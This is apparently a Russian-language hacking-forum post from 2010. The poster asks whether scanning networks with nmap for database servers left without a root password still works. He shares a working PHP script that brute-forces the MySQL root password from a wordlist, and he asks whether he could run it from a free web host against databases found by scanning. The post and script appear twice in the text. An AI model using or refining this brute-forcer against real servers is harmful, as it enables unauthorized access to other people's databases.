Demon1X
15.05.2010, 00:55
тут вчера наткнулся на статейку http://www.inattack.ru/article/469.html
суть которой сводится к тому что можно просканить сеть каким нибудь сканером (например nmap-ом) и попробывать приконнектится к СУБД с расчетом, что когда ее устанавливали забыли по дефолту пароль поставить
1. это актуально? т.е. такое еще работает, статейка та не первой свежести
2. т.к. недавно начал изучать пых по прочтению решил набросать простой скриптик-брутер. У меня на локалхосте нормально пас подбирает к mysql. Вопрос можно ли будет его залить на фрихост с поддержкой пхп и оттуда брутить найденные сканером СУБД?
<?php
$host="localhost";
$name="root";
set_time_limit(0);
$f=fopen("words.dic","rt") or die("Нет файла с паролями!");
if (@mysql_connect($host,$name,"")){
echo "Пароля нет!";
fclose ($f);
@mysql_close();
exit;
}//if
while (true){
$str=trim(fgets ($f));
if ($str=="") break;
if (@mysql_connect($host,$name,$str)){
echo "Пароль: ".$str;
fclose ($f);
@mysql_close();
exit;
}//if
}//wh
echo "Пароль не найден!";
fclose ($f);
?>
суть которой сводится к тому что можно просканить сеть каким нибудь сканером (например nmap-ом) и попробывать приконнектится к СУБД с расчетом, что когда ее устанавливали забыли по дефолту пароль поставить
1. это актуально? т.е. такое еще работает, статейка та не первой свежести
2. т.к. недавно начал изучать пых по прочтению решил набросать простой скриптик-брутер. У меня на локалхосте нормально пас подбирает к mysql. Вопрос можно ли будет его залить на фрихост с поддержкой пхп и оттуда брутить найденные сканером СУБД?
<?php
$host="localhost";
$name="root";
set_time_limit(0);
$f=fopen("words.dic","rt") or die("Нет файла с паролями!");
if (@mysql_connect($host,$name,"")){
echo "Пароля нет!";
fclose ($f);
@mysql_close();
exit;
}//if
while (true){
$str=trim(fgets ($f));
if ($str=="") break;
if (@mysql_connect($host,$name,$str)){
echo "Пароль: ".$str;
fclose ($f);
@mysql_close();
exit;
}//if
}//wh
echo "Пароль не найден!";
fclose ($f);
?>